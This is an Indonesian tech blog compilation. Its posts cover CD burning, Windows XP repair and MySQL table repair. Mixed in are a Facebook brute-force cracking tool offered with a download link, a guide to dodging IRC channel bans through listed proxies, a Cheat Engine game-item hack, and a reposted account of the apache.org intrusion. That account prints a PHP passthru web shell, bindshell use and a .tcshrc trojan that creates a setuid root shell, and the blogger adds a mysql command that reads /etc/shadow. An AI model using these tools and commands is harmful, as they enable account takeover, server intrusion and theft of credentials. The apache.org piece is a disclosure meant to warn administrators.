Burning CD/DVD dengan Hiren’s BootCD 9.8

Anda pernah bertanya-tanya apakah Anda bisa melakukan burning CD tanpa menginstall program apapun dalam Windows? Atau pernah berpikir bahwa dalam kondisi darurat Anda harus menyelamatkan data ke dari harddisk PC yang mengalami kegagalan Sistem Operasi? Hirens’s Boot CD jawabannya. Tool multiguna Hiren ini datang dengan paket program burning tool (sebutan umum program pembakar/pengkopi CD dan DVD)yang fleksibel. Hanya dengan mengetikkan sebaris perintah dalam command prompt Anda kini bisa mem-backup data penting dari PC Anda pada saat-saat kritis ketika PC mengalami masalah.

Hiren’s Boot CD seperti dalam ulasan sebelumnya, berisi kompilasi sejumlah tool yang berguna untuk melakukan backup, recovery sistem operasi dan data, sekaligus reparasi software dan hardware. Salah satu program yang menarik kita bahas di sini adalah program untuk melakukan burning CD/DVD. Dengan Hiren Anda bisa melakukan burning tanpa harus menginstall program apapun. Bahkan dengan burning tool versi DOS kita tidak lagi tergantung pada sistem operasi yang ada di komputer.

Program yang saya maksud di sini adalah ExpressBurn dan DosCDRoast beta2. ExpressBurn adalah burning tool yang terintegrasi pada menu autorun Hirens. Sementara dosCDroast adalah burning tool yang berjalan dalam ms-dos prompt.

Sekarang, mari kita langsung bahas satu persatu:

Pertama, ExpressBurn.
Program ini merupakan burning tool dengan GUI (Graphical User Interface) yang berjalan dalam sistem Operasi Windows. Expressburn datang bersama paket menu Autoplay Hiren’s Boot CD. Program ini bisa menjadi alternatif jika Komputer Anda tidak memiliki program sejenis seperti Nero Essentials/Burning Tool atau CloneCD. Anda tidak perlu khawatir tentang format media yang didukung program ini. ExpressBurn telah mendukung berbagai format CDR/RW, DVD-+R/RW, bahkan Blue Ray Disk. Untuk mengakses program ini silakan:
1. Booting seperti biasa ke dalam Windows dan masukkan Hiren’s Boot CD ke dalam Drive Anda. Tunggu hingga Autoplay berjalan dan menampilkan menu Hiren’s. Jika Autoplay tidak muncul, klik kanan pada CD Drive berisi Hiren’s > Autoplay.
2. Dari menu Hiren’s seperti di bawah ini, pilih Backup > ExpressBurn.

3. Dari sini Anda tinggal memilih langkah yang selanjutnya Anda lakukan, diantaranya:

• membuat Image ISO dari CD/DVD.
• menggandakan CD/DVD dengan terlebih dahulu menentukan format yang akan digunakan.
• menyalin file dari harddisk ke dalam CD/DVD
• Membuat Audio, Data, Video CD/DVD dan HD-DVD
  

Langkahnya kurang lebih sama dengan Nero Burning Tool. Pilih format media > Pilih source file, tentukan drive untuk burning dan tentukan kecepatan burning. Udah deh, tinggal burn..

Kedua, DosCDroast 2 beta
DosCDroast merupakan satu-satunya program burning tool DOS yang disertakan dalam Hiren’s Boot CD. Program ini mengemulasi proses burning CD dari mode GUI. Untuk menjalankannya, Anda cukup melakukan langkah berikut ini:
Jalankan Hiren’s boot CD, pastikan Anda telah masuk ke menu utama. Program ini sangat ampuh digunakan untuk menyelamatkan data dari komputer yang sistem operasinya bermasalah.

Dari menu utama Hiren, pilih [9]Next > [5]Other Tools > [2]DosCDroast beta2. seperti urutan gambar di bawah ini.

Setelah selesai proses loading file utama CDroast, Hiren akan menampilkan panduan penggunaan program ini melalui text editor. Silakan baca untuk mengetahui baris perintah apa saja yang digunakan dan bagaimana cara penggunaannya.

Keluar dari tampilan ini lewat menu File > Exit. Hiren akan menampilkan baris perintah yang tersedia seperti gambar di bawah ini. Anda tentu sudah dapat mengira-ngira sendiri, baris perintah apa untuk melakukan apa.. Gampang kok. Misalnya untuk membuat sebuah file ISO dari CD Anda cukup mengetikkan cd2file.exe [namafile].iso [source drive]

Dengan program ini Anda bisa:

• menyalin data ke dalam disk
• burning file ISO ke CD
• menyelesaikan proses instalasi.
• menghapus CDRW
• mengubah file audio ke dalam format WAV atau MP3
• mengubah format MP3 ke dalam WAV atau PCM
• membuka/menutup drive tray
• menjalankan Adio CD dengan basis SVGA player
• memecah DVD, VOB dalam ukuran yang lebih kecil,
• me-recovery CD yang rusak dan bad sector
• menyediakan command prompt yang lebih sederhana untuk program CDR/CDRW yang lain.

Jika Anda kesulitan, silakan ketik saja perintah yang Anda kehendaki, sistem akan memandu proses penggunaannya. Anda tertarik mencoba?

Membuat Website memakai Joomla

Membuat website pribadi maupun portal kini semakin mudah saja dengan memanfaatkan CMS. Joomla! adalah Content Management System 9 CMS ) paling populer di dunia saat ini, selain gratis juga berdifat open source sehingga dengan bebas bisa kita gunakan, kita modifikasi bahkan boleh disebarkan lagi sesuai dengan aturan dari lisensi GNU/GPL.

Pilihan menggunakan CMS Jommla! adalah karena sokongan template, module, plugin dan komponen gratis yang cukup bahkan paling banyak ditemui diantara CMS lainnya. Pilihan utama menggunakan CMS ini juga dipengaruhi karena grafisnya yang sangat memuaskan dan system yang ada didalamnya sangat mudah dipahami .

CD Tutorial ini menerapkan penggunaan VirtueMart sebagai pasokan utama dalam pembuatan toko online. Bukan itu saja, pembuatan website professional dikupas tuntas dalam satu keping CD Tutorial dengan sajian menarik dan presentasi pembelajaran yang dinamis sehingga mudah dipahami hingga dipraktekkan dengan jenis tau project website lain.

Daftar Isi

BAB 1 INSTALASI XAMPP & JOOMLA

• Pendahuluan
• Isntall XAMPP
• Tentang XAMPP
• Instalasi paket inti Joomla

BAB 2 PENGELOLAAN JOOMLA

• Konfigurasi global joomla
• Manajemen konten& ilustrasi project
• Membuat, menghapus, dan mengedit section
• Membuat, menghapus, dan mengedit category
• Membuat artikel
• Artikel bergambar
• Artikel dengan Readmore
• Artikel dengan PageBreak
• Menu manager
• Tentang menu manager
• Menambah menu ,ain menu
• Membuat menu berita
• Menu resep
• Membuat top menu
• Membuat menu depan

BAB 3 TEMPLATE

• Tentang template
• Modifikasi template
• Ganti header
• Install template
• Tips dan trik template

BAB 4 MODULE

• Tentang module
• Posisi module
• Tips dan trik module
• Membuat module sendiri
• Installasi module
• Installasi dan kofigurasi Modul Popular
• Installasi dan kofigurasi Modul Latest News
• Installasi dan kofigurasi Modul Search
• Installasi dan kofigurasi Modul Random Image
• Installasi dan kofigurasi Modul Breadcrumb
• Installasi dan kofigurasi Modul Polling

BAB 5 USER MANAGER

• Tentang user dalam jommla
• Hak akses user
• Administrasi Front End
• Membuat menu user
• Illustrasi registrasi user

BAB 6 KOMPONEN

• Instalasi pocha gallery
• Konfigurasi komponen pocha gallery

BAB 7 PLUGIN

• Installasi bahasa indonesia

BAB 8 FORUM

• Installasi komponen forum
• Installasi ccboard
• Konfigurasi komponen forum

BAB 9 TOKO ONLINE

• Installasi komponen toko online
• Konfigurasi komponen toko online

BAB 10 KONFIGURASI UPLOAD

• Joomla sever hosting online
• Upload data webUpload master joomla di hosting
• Menggunakan fantastico installer
• Pemasangan modul tambahan

cara benerin Windows XP tanpa instalasi ulang

Berikut tahapan2 sesuai dengan jenis kesalahan.

1. Memperbaiki Instalasi (Repair Install)

Jika Windows XP Anda rusak (corrupted) dimana Anda tidak mempunyai sistem operasi lain untuk booting,
Anda dapat melakukan perbaikan instalasi (Repair Install) yang bekerja sebagaimana setting (pengaturan)
yang awal.

- Pastikan Anda mempunyai kunci (key) Windows XP yang valid.
- Keseluruhan proses akan memakan waktu kurang lebih 1/2 atau 1 jam, tergantung spek komputer Anda.
- Jika Anda dimintai password administrator, sebaiknya Anda memilih opsi perbaikan (repair) yang kedua,
bukan yang pertama.


- Masukkan CD Windows XP Anda dan lakukan booting dari CD tersebut.
- Ketika sudah muncul opsi perbaikan kedua R=Repair, tekan tombol R
Ini akan memulai perbaikan.
- Tekan tombol F8 untuk menyetujui proses selanjutnya "I Agree at the Licensing Agreement"
- Tekan tombol R saat direktori tempat Windows XP Anda terinstal. Biasanya C:\WINDOWS
Selanjutnya akan dilakukan pengecekan drive C: dan mulai menyalin file-file.
Dan secara otomatis restart jika diperlukan. Biarkan CD Anda dalam drivenya.
- Berikutnya Anda akan melihat sebuah gambar "progress bar" yang merupakan bagian dari perbaikan,
dia nampak seperti instalasi XP normal biasanya, meliputi "Collecting Information, Dynamic Update,
Preparing Installation, Installing Windows, Finalizing Installation".
- Ketika ditanya, klik tombol Next
- Ketika ditanya untuk memasukkan kunci, masukkan kunci (key) Windows XP Anda yang valid.
- Normalnya Anda menginginkan tetap berada dalam nama Domain atau Workgroup yang sama.
- Komputer akan restart.
- Kemudian Anda akan mempunyai layar yang sama sebagaimana pengaktifan sistem ketika instalasi normal.
- Register jika Anda menginginkannya (biasanya tidak diperlukan).
- Selesai

Sekarang Anda bisa log in dengan account Anda yang sudah ada
2. NTOSKRNL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapati pesan error bahwa "NTOSKRNL not found" / NTOSKRNL tak ditemukan, lakukan:
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Pindahlah ke drive CD Drive Anda berada.
- Tulis: CD i386
- Tulis: expand ntkrnlmp.ex_ C:\Windows\System32\ntoskrnl.exe
- Jika Windows XP Anda terinstal di tempat lain, maka ubahlah sesuai dengan lokasinya.
- Keluarkan CD Anda dan ketikkan EXIT

3. HAL.DLL Rusak atau Hilang (Missing or Corrupt)

Jika Anda mendapatkan error berkenaan dengan rusak atau hilangnya file hal.dll, ada kemungkinan
file BOOT.INI mengalami salah konfigurasi (misconfigured).

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Tulis: bootcfg /list
Menampilkan isi/masukan pada file BOOT.INI saat ini
- Tulis: bootcfg /rebuild
Memperbaiki konfigurasi dari file BOOT.INI
- Keluarkan CD Anda dan ketikkan EXIT

4. Direktori \WINDOWS\SYSTEM32\CONFIG rusak atau hilang

Jika Anda mendapatkan error dengan tulisan:

"Windows could not start because the following files is missing or corrupt
\WINDOWS\SYSTEM32\CONFIG\SYSTEM or \WINDOWS\SYSTEM32\CONFIG\SOFTWARE"

- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Tulis: cd \windows\system32\config
- Berikutnya tergantung di bagian mana letak terjadinya kerusakan:
- Tulis: ren software software.rusak ATAU ren system system.rusak
- Berikutnya lagi juga tergantung di bagian mana letak terjadinya kerusakan:
- Tulis: copy \windows\repair\system
- Tulis: copy \windows\repair\software
- Keluarkan CD Anda dan ketikkan EXIT

5. NTLDR atau NTDETECT.COM tak ditemukan (NTLDR or NTDETECT.COM Not Found)

Jika Anda mendapati error bahwa NTLDR tak ditemukan saat booting:

a. Untuk partisi tipe FAT
- Silakan Anda melakukan booting dari disket Win98 Anda dan salinlah file NTLDR atau NTDETECT.COM
dari direktori i386 ke drive induk/akar (root) C:\

b. Untuk partisi tipe NTFS
- Masukkan CD Windows XP dan booting dari CD tersebut.
- Pada saat muncul opsi R=Repair yang pertama, tekan tombol R.
- Tekan angka sesuai dengan lokasi instalasi Windows yang ingin diperbaiki yang sesuai.
- Biasanya #1
- Masukkan password administrator jika diperlukan.
- Masukkan perintah berikut, dimana X: adalah alamat drive dari CD ROM Anda (Sesuaikan!).
- Tulis: COPY X:\i386\NTLDR C\:
- Tulis: COPY X:\i386\NTDETECT.COM C:\
- Keluarkan CD Anda dan ketikkan EXIT

Benerin Struktur Tabel MySQL yang Rusak pake cara REPAIR TABLE

Saat pelaksanaan penilaian portofolio sertifikasi guru di tahun 2008, banyak hal baru dan pengalaman baru yang telah kami dapatkan sebagai tim data. Salah satu diantaranya adalah cara memperbaiki struktur tabel MySQL yang rusak, padahal di dalamnya ada ribuan data nilai portofolio sertifikasi guru.

Berikut ini sedikit sharing bagaimana cara memperbaiki struktur tabel MySQL yang rusak berdasarkan pengalaman kami.

Sebagai informasi awal bahwa untuk keperluan penilaian portofolio sertifikasi guru ini, kami (tim data) telah membuat sistem penilaian yang bersifat multiuser, dengan data yang terintegrasi menjadi satu dalam sebuah server. Waktu itu ketika para asesor (sekitar 100 an lebih) mengentri nilai portofolio secara simultan, mendadak listrik mati. Di luar dugaan ternyata UPS yang membackup server tidak mendukung sehingga dalam waktu yang tidak lama akhirnya server juga mati

Setelah listrik menyala kembali, kami langsung cek keberadaan data penilaian dalam database karena khawatir datanya hilang atau rusak. Alhamdulillah ternyata database, tabel dan data hasil penilaian masih ada. Segera saja, proses penilaian kembali dilanjutkan.

Namun… apa yang terjadi? meskipun database, tabel dan data masih ada, ternyata proses entri nilai yang baru gagal dilakukan. Setiap kali data nilai dientri, munculnya adalah error. Sayang… saya tidak sempat mendokumentasikan errornya Waduh… ada apa ini? Ketika kami mencoba mengentri langsung datanya melalui interface seperti phpMyAdmin, hal yang sama (error) muncul. Feeling kami adalah pasti sesuatu terjadi dengan databasenya akibat listrik mendadak mati tadi. Mungkin struktur database atau tabelnya ada yang corrupt atau rusak.

Melihat hal tersebut.. segera kami (tim data) mengadakan rapat kilat untuk membahas hal yang terjadi. Beberapa alternatif solusi telah ditawarkan oleh beberapa teman dalam tim data berdasarkan pengalamannya masing-masing, mulai dari create database baru, buat tabel baru, mengulangi lagi entri dari awal dsb. Diantara beberapa alternatif solusi tersebut, ada ide salah satu teman yang menyarankan untuk mencoba memperbaiki struktur tabel yang rusak tersebut.

Meskipun bersifat ‘mencoba-coba’ akhirnya kami coba juga merepair tabel MySQL nya. Karena jelas bahwa membuat database baru, dan mengulangi lagi entri data dari awal tidak mungkin dilakukan mengingat data yang telah dientri hampir mendekati 80% dari keseluruhan dan waktu yang diberikan sangat terbatas.

Langkah memperbaiki atau merepair tabel yang kami lakukan adalah dengan memberikan perintah query SQL:

REPAIR TABLE namatabel;

Alternatif lain perintah yang bisa diberikan adalah

myisamchk --recover namatabel

Apabila setelah menjalankan perintah atau query di atas muncul pesan ‘OK’, maka tabel terlah berhasil diperbaiki. Namun bila pesan ‘OK’ belum muncul (tabel masih belum bisa diperbaiki), maka Anda bisa coba alternatif perintah:

myisamchk --safe-recover namatabel

Alhamdulillah setelah tabel direpair dengan menggunakan perintah di atas, akhirnya tabel bisa digunakan kembali secara normal. Memang setelah tabel direpair, ada sebuah data (record) yang hilang. Tapi itu tak mengapa, karena itu masih jauh lebih baik daripada mengulangi entri dari awal semuanya

Catatan:
Perintah REPAIR di atas hanya bisa dilakukan pada tabel yang bertipe MyISAM atau ARCHIVE. Untuk tabel bertipe INNODB sampai saat ini saya belum dapat informasi bagaimana cara memperbaikinya

Mudah-mudahan sharing di atas dapat bermanfaat bagi Anda yang sedang mengalami hal serupa.

Cara Memakai Proxy IRC

Mungkin kamu pernah mengalami kejadian ketika chatting di irc tidak dapat masuk pada channel tertentu karena status kamu sedang dibanned. Melalui artikel ini akan saya ketengahkan cara penggunaan proxy pada irc sehingga kamu tetap bisa masuk ke chan yang nge-ban kamu.

Pada umumnya irc disetting dengan menggunakan IP address lokal. Apabila kamu diban oleh suatu chan maka chan tersebut hanya mem-ban IP address lokal kamu saja. Kamu masih bisa masuk ke chan itu dengan menggunakan proxy. Caranya:

1. Buka Mirc
2. Pilih File > Options
3. Pilih Connect > Local Info
4. Pada kolom IP Address isikan IP Proxy kamu ( beberapa alamat free proxy bisa kamu peroleh di artikel ini )
5. Selanjutnya masih dalam menu Connect pilih Firewall
6. Pada pilihan Protocol pilihlah Proxy
7. Pada kolom Port isi port proxy kamu
8. Selanjutnya connect ke server seperti biasa

Cobalah masuk ke chan yang mem-ban kamu. Bisa khan??. Beberapa keuntungan lain penggunaan proxy adalah:

1. Kamu bebas melakukan apa saja di chan tanpa takut dibann, bila dibann lagi kamu bisa ganti dengan proxy lainnya.
2. Bila kamu menggunakan proxy luar negeri. Orang yang me-whois kamu akan mengira kamu tinggal di luar negeri.
3. Bila kamu ingin mentake over sebuah chan, kamu tak perlu takut diketahui op chan tersebut.
4. Kamu bisa membuat banyak nick dengan IP yang beda-beda. Ini akan sangat berguna bagi op yang chan-nya sepi pengunjung.
5. Lain-lain..

Berikut ini akan saya sertakan daftar proxy gratis yang saya dapatkan dari http://www.thebestfree,net/free/freeproxy.htm

208.147.189.1 80
206.132.131.182 80
208.130.114.23 80
207.86.120.62 80
194.197.196.10 80
210.154.4.226 8080
194.197.196.11 80
200.241.204.1 80
194.105.236.2 8080
194.52.146.76 8080
195.34.39.201 80
194.111.49.3 8080
212.13.34.244 80
209.165.181.3 80
207.105.34.11 80
200.12.232.18 80
206.98.203.20 80
207.122.162.2 8080
207.13.2.172 8080
206.171.61.50 8080
206.99.218.242 80
206.30.146.110 80
207.10.206.250 3128
216.46.49.2 80
207.35.44.34 8080
203.136.223.59 8080
207.124.93.66 80
12.33.168.162 8080
196.27.0.30 80
194.196.196.100 80
194.16.204.2 80
195.161.214.252 3128
194.73.231.251 80
207.154.143.114 80
194.126.101.250 80
12.8.2.2 8080
212.192.98.70 3128
207.154.143.116 80
207.109.173.251 80
195.74.130.247 80
207.175.129.2 80
195.35.2.98 80
206.252.237.21 80
203.148.200.249 80
192.139.230.250 8000
207.229.251.2 80
195.50.4.46 80
129.93.1.53 8080
195.31.186.2 8080
62.20.71.58 80
206.99.218.240 80
216.58.100.9 3128
204.59.80.236 80
210.155.45.2 8080
210.169.42.242 8080
195.208.95.193 8080
212.4.64.26 80
130.149.17.15 80
203.167.102.3 80
207.136.80.204 80
216.168.96.25 8080
202.32.211.3 3128
210.162.161.130 8080
195.61.64.37 80
208.153.156.123 8080
210.227.167.66 8080
132.248.202.1 80
24.131.128.12 8080
157.100.1.16 8080
209.58.11.227 80
203.24.77.246 80
194.133.122.44 8080
192.96.97.21 80
208.140.112.9 80
208.135.98.70 80
208.132.172.4 80
208.13.0.49 80
207.8.141.245 8080
207.63.194.39 8080
207.38.64.252 80
207.248.186.3 80
207.241.99.2 8080
207.232.25.80 8080
207.231.142.17 80
207.230.222.234 8080
207.206.44.3 80
207.205.79.162 80
207.170.17.82 8080
207.159.125.2 80
207.155.70.123 8080
207.155.183.79 80
207.155.183.77 80
207.155.183.76 80
207.15.187.7 80
207.115.55.201 8080
207.108.70.1 80
207.106.79.20 80
207.104.164.135 8080
206.71.65.2 80
206.67.97.165 80
206.66.64.13 80
206.65.142.5 80
206.49.216.243 80
206.29.125.222 8080
206.246.226.13 80
206.24.101.39 8080
206.191.101.227 8080
206.186.56.100 80
206.183.64.3 80
206.183.162.187 8080
206.176.142.146 80
206.167.240.2 8080
206.155.163.226 80
206.135.73.234 80
206.129.166.251 8080
206.112.41.14 80
205.167.0.11 80
204.244.151.1 80
204.167.116.2 8080
199.2.139.183 80
195.67.54.2 80
195.43.240.2 3128
195.43.239.130 3128
195.22.74.10 80
195.201.255.117 3128
195.148.161.92 80
194.68.59.5 80
194.52.182.123 80
194.236.80.2 80
194.18.100.72 8080
194.137.40.11 8080

Facebook Brute Force tools

screenshot ;
http://i861.photobucket.com/albums/ab178/novia_laoh/facebooz.jpg
http://i861.photobucket.com/albums/ab178/novia_laoh/brutePorce_pesbuk2.jpg


Ini buat FaceBooz yak..
Pertama situ masukan email target,
trus situ cari passfile yang "dictionary.txt" nya yang dah ditentukan.
trus start brutus deh musuhnya popaye,,,
walaupun (kata om underdos) fifty fifty,,
kalo ada usaha pasti ada jalan menuju neraka..!!
hihihihihiiii....


Kalo yang facebook crackernya ..
silahkan dicoba coba sendiri..
krn saya blum pernah coba
Nenek saya yg dah coba,katanya sih bisa,,
jiakakakakakakak!!!

Donlod dimari

Quote:

http://rapidshare.com/files/255451493/BrutePorce_pesbuk1.rar.html

* Report this post * Reply with quote poc jadul (apache.org diroot grey hat krn mysqld run as root

Kutipan poc deface apache.org jaman jadul
kesalahan fatal krn mysqld (daemon mysql -> program yg bind()-> listen() utk mengurusi servis mysql) dirun sbg root

pada jaman dahulu kala di suatu ngeri dongeng yg indah di saat hacker 2 linux menguasai dunia terjadilah kisah ini:

How we defaced www.apache.org
by {} and Hardbeat

/*
* Before you start reading
*/
This paper does _not_ uncover any new vulnerabilities. It points out common
(and slightly less common) configuration errors, which even the people at
apache.org made. This is a general warning. Learn from it. Fix your systems,
so we won't have to

/*
* introduction
*/
This paper describes how, over the course of a week, we succeeded in
getting root access to the machine running www.apache.org, and changed
the main page to show a 'Powered by Microsoft BackOffice' logo instead
of the default 'Powered by Apache' logo (the feather). No other changes
were made, except to prevent other (possibly malicious) people getting in.

Note that the problems described in this paper are not apache-related,
these were all config errors (one of 'm straight from BugZilla's README,
but the README had enough warnings so I don't blame the BugZilla developers).
People running apache httpd do not need to start worrying because of
anything uncovered herein.

We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor
the apache server source and end up having lots of owned boxes.

We just couldn't allow this to happen, we secured the main ftproot==wwwroot
thing. While having owned root we just couldnt stand the urge to put that
small logo on it.

/*
* ftproot == wwwroot
* o+w dirs
*/
While searching for the laters apache httpserver to diff it the with
previous version and read that diff file for any options of new buffer
overflows, we got ourselves to ftp://ftp.apache.org. We found a mapping of
the http://www.apache.org on that ftp including world writable directories.

So we wrote a little wuh.php3 including
passthru($cmd);
?>

and uploaded that to one of the world writable directories.


/*
* Our commands executed
*/
Unsurprisingly, 'id' got executed when called like

http://www.apache.org/thatdir/wuh.php3?cmd=id

Next was to upload some bindshell and compile it like calling
http://www.apache.org/thatdir/wuh.php3? ... pd+httpd.c and then
executing it like calling http://www.apache.org/thatdir/wuh.php3?cmd=./httpd


/*
* The shell
*/
Ofcourse we used a bindshell that first requires ppl to authenticate with
a hardcoded password (:

Now we telnet to port 65533 where we binded that shell and we have local
nobody access, because cgi is running as user nobody.


/*
* The apache.org box
*/
What did we find on apache.org box:
-o=rx /root
-o=rx homedirs

apache.org is a freebsd 3.4 box. We didn't wanted to use any buffer
overflow or some lame exploit, goal was to reach root with only
configuration faults.


/*
* Mysql
*/
After a long search we found out that mysql was
running as user root and was reachable locally. Because apache.org was
running bugzilla which requires a mysql account and has it
username/password plaintext in the bugzilla source it was easy to
get a username/passwd for the mysql database.

We downloaded nportredird and have it set up to accept connections on
port 23306 from our ips and redir them to localhost port 3306 so we could
use our own mysql clients.


/*
* Full mysql access
* use it to create files
*/
Having gained access to port 3306 coming from localhost, using the login
'bugs' (which had full access [as in "all Y's"]), our privs where
elevated substantially. This was mostly due to sloppy reading of the BugZilla
README which _does_ show a quick way to set things up (with all Y's) but
also has lots of security warnings, including "don't run mysqld as root".

Using 'SELECT ... INTO OUTFILE;' we were now able to create files
anywhere, as root. These files were mode 666, and we could not overwrite
anything. Still, this seemed useful.

But what do you do with this ability? No use writing .rhosts files - no
sane rshd will accept a world-writable .rhosts file. Besides, rshd
wasn't running on this box.


/*
* our /root/.tcshrc
*/
Therefore, we decided to perform a trojan-like trick. We used database
'test' and created a one-column table with a 80char textfield. A couple
of inserts and one select later, we had ourselves a /root/.tcshrc with
contents similar to:
#!/bin/sh
cp /bin/sh /tmp/.rootsh
chmod 4755 /tmp/.rootsh
rm -f /root/.tcshrc


/*
* ROOT!!
*/
Quite trivial. Now the wait was for somebody to su -. Luckily, with 9
people legally having root, this didn't take long. The rest is trivial
too - being root the deface was quickly done, but not until after a
short report listing the vulnerabilities and quick fixes was build.
Shortly after the deface, we sent this report to one of the admins.


/*
* Fix that ftproot==wwwroot
*/
Another thing we did before the deface, was creating a file 'ftproot' in
the wwwroot (which was also ftproot), moving 'dist' to 'ftproot/dist'
and changing the ftproot to this new 'ftproot' dir, yielding the
world-writable dirs unexploitable but allowing ftp URLs to continue
working.


/*
* What could have been compromised?
*/
Remember the trojaned tcp_wrappers on ftp.win.tue.nl last year? If we
wanted to, we could have done the same thing to Apache. Edit the source
and have people download trojaned versions. Scary, eh?


/*
* In short:
*/
- ftproot==webroot, worldwritable dirs allowing us to upload and execute
php3 scripts
- mysqld running as root, with a FULL RIGHTS login without a password.


/*
* Compliments for the Apache admin team
*/
We would like to compliment the Apache admin team on their swift
response when they found out about the deface, and also on their
approach, even calling us 'white hats' (we were at the most 'grey hats'
here, if you ask us).


Regards,
{} and Hardbeat.

{} (mailto:karin@root66.nl.eu.org) is part of
RooT66 - http://root66.nl.eu.org
ShellOracle - http://www.shelloracle.cjb.net
b0f - http://b0f.freebsd.lublin.pl

Hardbeat (petervd@vuurwerk.nl) just has a lame page at
http://www.dataloss.net/
-----------------------------------------------------


keterangan:
- pada freebsd startup shell root tadi adl .tcshrc pada linux umum biasanya adl .bashrc (tergantung jenis shell root, biasanya bisa dilihat di /etc/passwd)
- jika mysqld run as root maka seorang attacker yg mengetahui passwd root mysql bisa menggunakan perintah system di command line mysql dg kekuasaan root , misal:
$mysql -h 127.0.0.1 -u root -p:
*****
mysql> system cat /etc/shadow;

- melihat pakah mysqld run as root:

Code: Select all

ps aux | grep mysqld


misal mysqld run as root :

Code: Select all

root@solhack.ath.cx# ps aux | grep mysqld
root 22067 0.1 8.7 184716 68508 ? Sl Jul02 31:20 /usr/sbin/mysqld
--basedir=/ --datadir=/var/lib/mysql --user=root --pid-file=/var/lib/mysql/localhost.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock

Cheat RF Online Indonesia [Edit Item: Level/Skill/Race]

Masih merupakan bagian dari seri Cheat RF Online, kali ini Gw akan mencoba menjelaskan cara gimana agar char kita bisa menggunakan item/armor/weapon dengan level, skill, pt skill dan race yang berbeda.

Persiapan

# Cheat Engine, download n install.
# Client RF Online – SOH (Secret Of Holystone) / Legen of Elven
# Int Missile Launcher (lv.45). Terserah, weapon apa aja yang ingin lo pakai.
# Satu buah weapon biasa, yang pasti, yang lagi lo pake sekarang.
# Siap-siap di BAN, kalau ampe ketahuan.

1. Jalankan game RF Online, setelah masuk ke dalam game, jalankan Cheat Engine yang telah diinstall. Senjata yang akan Gw ubah adalah Intense Missile Launcher. Simpan senjata yang akan kita ubah ke dalam bank :




2. Pilih proses RF_Online.bin melalui menu Open dalam program Cheat Engine.

3. Ubah Value Type menjadi Text



4. Ketikkan nama weapon kita di kolom Text yang disediakan. Klik ‘First Scan’, tunggu beberapa saat, maka dibagian kiri akan muncul offset address dengan value-nya.



5. Nah, sekarang lo cari di tiap address, dengan cara klik kanan di address-nya kemudian pilih ‘Browse this memory region’:



Cari dan ubah di semua address yang memiliki format seperti “XX XX FF XX FF“, lihat gambar:





Dari gambar di atas, yang didapat adalah: ‘2D 02 FF 21 FF‘, dan ‘41‘ di bagian atas 2D.

2D : merupakan level item.
02 : merupakan tipe skill.
21 : merupakan pt skill dari item tersebut.
41 : merupakan jenis race ACC. (bell = 71(113) , acc = 41(65) , cora = 81(129) ).

Nilai di atas bisa berbeda2 tergantung dari item yang kita scan.

6. Klik kanan 2D dan pilih edit, akan muncul 1 kotak dimana lo bisa mengganti level item tersebut.





Karena level char Gw masih 41, maka nilai 45 di atas Gw ganti menjadi 41:



Lakukan hal sama dengan 21 (merupakan pt skill, jika pt skill lo belum mencukupi).

Lakukan proses di atas untuk semua address yang memiliki ‘2D 02 FF 21 FF‘.

7. Setiap posisi address akan berbeda2, seperti pada gambar di bawah posisi ‘2D 02 FF 21 FF‘ agak ke atas:



8. Lakukan proses yang sama pada langkah 6 di atas untuk setiap address dari langkah 5. Jika semuanya telah lo ubah, sekarang saatnya kita mengganti item asli kita dengan item yang telah kita ubah tadi.

9. Jika semuanya telah benar, maka Intense Missile Launcher Gw akan menjadi seperti ini:



Jika tidak, ulangi langkah2 di atas.

10. Hotswap item yang lo pake sekarang dengan item dalam bank yang telah kita ubah tadi. (Langsung di ganti ke bank, tanpa melalui tas).



11. Hasil akhirnya akan seperti ini:



Tambahan :

1. Proses ini berlaku untuk semua weapon, armor, item, bahkan elemental dari level, skill ataupun race yang berbeda. Lo bahkan bisa menggunakan CE buat mengganti cincin biasa mengganti cincin elemental, just search for it!.
2. Semua proses perubahan harus dilakukan di bank.
3. Untuk perubahan jumlah slot juga bisa dilakukan, silahkan dicari sendiri buat PR
4. Jangan sekali2 mengenakan armor atau weapon lv.50 pada char level 1, coz pasti akan di BAN!
5. Jangan pernah melakukan proses di atas berulang2, coz akan menambah beban server! Kemungkinan Server akan sering Close.
6. Tiap kali lo Log Out atau keluar dari game, item lo masih ada dan masih bisa digunakan, tapi lo harus lakukan pencarian ulang lagi, coz damage-nya g bakal berfungsi. Dengan kata lain, hanya sementara selama lo ada dalam game

Browser 3D ( petualangan baru di dunia maya)

+

----

-

Ingin merasakan sensasi lebih hidup saat berpetualang di dunia maya? Kini hal tersebut dapat diwujudkan dengan sebuah web browser 3 dimensi (3D).

Pengembang software yang berbasis di Melbourne, ExitReality, mengembangkan sebuah software yang dapat didownload ke komputer dan mengubah tampilan situs 2 dimensi menjadi 3D

User akan direpresentasikan dengan avatar, dan dapat berjalan-jalan, serta bertemu dengan user lainnya yang sedang membuka situs yang sama.

Sebelumnya hanya ada situs tertentu seperti Second Life dan World of Warcraft yang memungkinkan user memasuki dunia 3D. Namun, Danny Stefanic, nama pengembang software ini, mengklaim bahwa ExitReality menawarkan lebih dari itu. ExitReality memungkinkan user untuk tidak hanya melihat satu situs tapi keseluruhan situs dalam tampilan 3D, demikian seperti dikutip detikINET dari AFP, Jumat (19/9/2008).

User dapat menggunakan ExitReality untuk menjadikan halaman situs jejaring sosial seperti Facebook dan Myspace ke dalam apartemen virtual.

Jika user menggunakan ExitReality untuk melihat video Youtube, maka tampilan akan berubah menjadi seperti bioskop virtual. Di sini user akan melihat video bersama user yang lain.

"User dapat melihat dan berbagi pengalaman dengan teman-teman mereka sambil chatting," tambah Stefanic. Tampilan 3D diprediksikan akan membuat user lebih betah berselancar di dunia maya.

